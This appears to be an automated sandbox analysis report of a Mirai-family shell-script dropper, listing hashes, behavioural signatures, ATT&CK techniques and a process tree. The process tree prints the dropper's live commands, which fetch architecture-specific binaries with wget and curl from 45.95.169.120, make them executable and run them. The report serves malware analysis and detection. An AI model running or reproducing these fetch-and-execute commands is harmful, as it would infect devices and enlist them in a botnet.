Analysis
-
max time kernel
11s -
max time network
55s -
platform
debian-9_armhf -
resource
debian9-armhf-20240418-en -
resource tags
arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
03-01-2025 03:38
Static task
static1
Behavioral task
behavioral1
Sample
74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh
Resource
debian9-mipsbe-20240729-en
General
-
Target
74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh
-
Size
2KB
-
MD5
ed9afc8adb1a34f93090873f6b76ec07
-
SHA1
13b5f418f63a32c61e493995e10e3baa0b02caab
-
SHA256
74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091
-
SHA512
3ef263bf7ef4cadcc3587d3ef891289cb051087c9d125a74fc8f34f16cda89ca79c2a5ae6f2d0edee3f87855de37af4a594779d6d0d332beade0654e102bd049
Malware Config
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 11 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 813 chmod 687 chmod 698 chmod 713 chmod 726 chmod 758 chmod 779 chmod 796 chmod 676 chmod 740 chmod 765 chmod -
Executes dropped EXE 11 IoCs
ioc pid Process /tmp/WTF 678 WTF /tmp/WTF 688 WTF /tmp/WTF 699 WTF /tmp/WTF 714 WTF /tmp/WTF 727 WTF /tmp/WTF 742 WTF /tmp/WTF 759 WTF /tmp/WTF 766 WTF /tmp/WTF 780 WTF /tmp/WTF 797 WTF /tmp/WTF 814 WTF -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF -
Writes file to system bin folder 2 IoCs
description ioc Process File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF -
resource yara_rule behavioral2/files/fstream-1.dat upx behavioral2/files/fstream-4.dat upx behavioral2/files/fstream-8.dat upx -
Checks CPU configuration 1 TTPs 11 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/exe WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/exe WTF File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/exe WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 684 curl 686 cat 680 wget -
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/wind.x86 wget File opened for modification /tmp/wind.arc wget File opened for modification /tmp/wind.mpsl wget File opened for modification /tmp/wind.arm6 curl File opened for modification /tmp/wind.x86 curl File opened for modification /tmp/wind.i686 curl File opened for modification /tmp/wind.arm curl File opened for modification /tmp/wind.arm6 wget File opened for modification /tmp/wind.arm7 wget File opened for modification /tmp/wind.mips wget File opened for modification /tmp/wind.x86_64 curl File opened for modification /tmp/wind.mpsl curl File opened for modification /tmp/wind.arm5 wget File opened for modification /tmp/wind.arm5 curl File opened for modification /tmp/wind.arm7 curl File opened for modification /tmp/WTF 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh File opened for modification /tmp/wind.mips curl File opened for modification /tmp/wind.arc curl File opened for modification /tmp/wind.i468 curl File opened for modification /tmp/wind.arm wget
Processes
-
/tmp/74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh/tmp/74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh1⤵
- Writes file to tmp directory
PID:648 -
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.x862⤵
- Writes file to tmp directory
PID:651
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.x862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:665
-
-
/bin/catcat wind.x862⤵PID:675
-
-
/bin/chmodchmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh systemd-private-c282207c8dc74748a57aada698a482f6-systemd-timedated.service-mMcz7L wind.x86 WTF2⤵
- File and Directory Permissions Modification
PID:676
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:678
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:680
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:684
-
-
/bin/catcat wind.mips2⤵
- System Network Configuration Discovery
PID:686
-
-
/bin/chmodchmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh systemd-private-c282207c8dc74748a57aada698a482f6-systemd-timedated.service-mMcz7L wind.mips wind.x86 WTF2⤵
- File and Directory Permissions Modification
PID:687
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:688
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.arc2⤵
- Writes file to tmp directory
PID:690
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.arc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:691
-
-
/bin/catcat wind.arc2⤵PID:696
-
-
/bin/chmodchmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh systemd-private-c282207c8dc74748a57aada698a482f6-systemd-timedated.service-mMcz7L wind.arc wind.mips wind.x86 WTF2⤵
- File and Directory Permissions Modification
PID:698
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:699
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.i4682⤵PID:702
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.i4682⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:706
-
-
/bin/catcat wind.i4682⤵PID:711
-
-
/bin/chmodchmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh systemd-private-c282207c8dc74748a57aada698a482f6-systemd-timedated.service-mMcz7L wind.arc wind.i468 wind.mips wind.x86 WTF2⤵
- File and Directory Permissions Modification
PID:713
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:714
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.i6862⤵PID:715
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.i6862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:720
-
-
/bin/catcat wind.i6862⤵PID:725
-
-
/bin/chmodchmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh systemd-private-c282207c8dc74748a57aada698a482f6-systemd-timedated.service-mMcz7L wind.arc wind.i468 wind.i686 wind.mips wind.x86 WTF2⤵
- File and Directory Permissions Modification
PID:726
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:727
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.x86_642⤵PID:729
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.x86_642⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:732
-
-
/bin/catcat wind.x86_642⤵PID:737
-
-
/bin/chmodchmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh systemd-private-c282207c8dc74748a57aada698a482f6-systemd-timedated.service-mMcz7L wind.arc wind.i468 wind.i686 wind.mips wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:742
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.mpsl2⤵
- Writes file to tmp directory
PID:743
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:750
-
-
/bin/catcat wind.mpsl2⤵PID:757
-
-
/bin/chmodchmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh systemd-private-c282207c8dc74748a57aada698a482f6-systemd-timedated.service-mMcz7L wind.arc wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:758
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:759
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.arm2⤵
- Writes file to tmp directory
PID:761
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.arm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:763
-
-
/bin/catcat wind.arm2⤵PID:764
-
-
/bin/chmodchmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh systemd-private-c282207c8dc74748a57aada698a482f6-systemd-timedated.service-mMcz7L wind.arc wind.arm wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:765
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:766
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.arm52⤵
- Writes file to tmp directory
PID:770
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.arm52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:771
-
-
/bin/catcat wind.arm52⤵PID:778
-
-
/bin/chmodchmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh systemd-private-c282207c8dc74748a57aada698a482f6-systemd-timedated.service-mMcz7L wind.arc wind.arm wind.arm5 wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:779
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:780
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.arm62⤵
- Writes file to tmp directory
PID:781
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.arm62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:787
-
-
/bin/catcat wind.arm62⤵PID:794
-
-
/bin/chmodchmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh systemd-private-c282207c8dc74748a57aada698a482f6-systemd-timedated.service-mMcz7L wind.arc wind.arm wind.arm5 wind.arm6 wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:796
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Reads runtime system information
PID:797
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.arm72⤵
- Writes file to tmp directory
PID:798
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.arm72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:804
-
-
/bin/catcat wind.arm72⤵PID:812
-
-
/bin/chmodchmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh systemd-private-c282207c8dc74748a57aada698a482f6-systemd-timedated.service-mMcz7L wind.arc wind.arm wind.arm5 wind.arm6 wind.arm7 wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:813
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Reads runtime system information
PID:814
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.ppc2⤵PID:815
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
27KB
MD531695f8e13cc48d85194f28fae5b9947
SHA1c0aeffac04584edd671c647e93cfe3732357bca4
SHA25643756b412067a771fb68c6df35ccaf2e5668de697e189cd2a6f847ed5434d20d
SHA5127c1bd7c1857a825e1ddfafc3fc67a0e9a9221ab3ed64374f7a943f91fe08e19b6c200976bae214963c7f2cd1cf3c42624e35de03d125604b1da3a3eb5c914956
-
Filesize
113KB
MD5a1fe5416e612e6715d590130c2a5a9ca
SHA1fc47c47eef1e5a037446eb9e0d2b1711bf5975a3
SHA256212660d32a279ad8f1965a28df06992c62b714d52142e5389e03b5835664043c
SHA5128213076bfba398bb77df85c68ca8d1467b5197a2082237f54017ef0124133d6f63b4b85215916576a2392835f945a6f9c09bc710898993fc99a44f1d740ca890
-
Filesize
217B
MD5b5c5bc11ee843c629fe4dc7b16d9e3c8
SHA1b4f2fc81c39d2c053c55ee06a161655f6546a372
SHA25640e81787af6d49bfd5ff0dd8a740f823899d31ddf509e41b10165b13a8cc6e39
SHA512fe3c0c15734685ad54a0068e56cd4247e7cf4716257d25e1916fc69e2c0d7a490166b3802339fff264e3e4ef86d2d4c156f5866eb931e99dce15ad64c96f1a16
-
Filesize
217B
MD57996ac0d48cf7290dc39acdf4c6cbe78
SHA16949f5ef62883990e34538ee5bfdab36b5ddddde
SHA25696db2cd9e9a66997acbc90e8f591e6b1696bb47500d1d07db2d20e3c92de70a8
SHA5120eb9e26445b177be128aa076110ff2d3488641347c17eef3f2e44b50bb9fe18f4c7fa10cccf2985801fbfd5fcc5c163cf141452850927aa58f623737a9d9488a
-
Filesize
49KB
MD53634b5f771039cbfc6df6f88b84d97c3
SHA15e23bea077b83b856d36e2bf71f93682aa0ba014
SHA256888533f1ab6512e37757ab85fbf9cd35c31c524c8f0a02c1b2fe8c7baccab958
SHA5127bfcf670f38c5016d678fd8ffad60ec7c658d89b67badda109c7d45b2a19b89ba93dca5bc7f61c810ce0db1edd728f93c220aa80e328f2a1c3b4814c652bea4b
-
Filesize
25KB
MD5819856ae59567a9a45f09a578a8701d6
SHA1f10479dba7d8ce69c749bd30461ba4a1e0a75833
SHA256f1eb1a307496e1f0468c7a40e8b64d35e0052d9d1654d4a06b444c8218f9be38
SHA51210223b4bb6d324eeb9d3d0313e4d16b31dbd4111fb0f9c5b5319e539277c0d05dcf67ac802b9c45fbb7248884370cc0ff0855547e5e39b8930aab2e8105090cb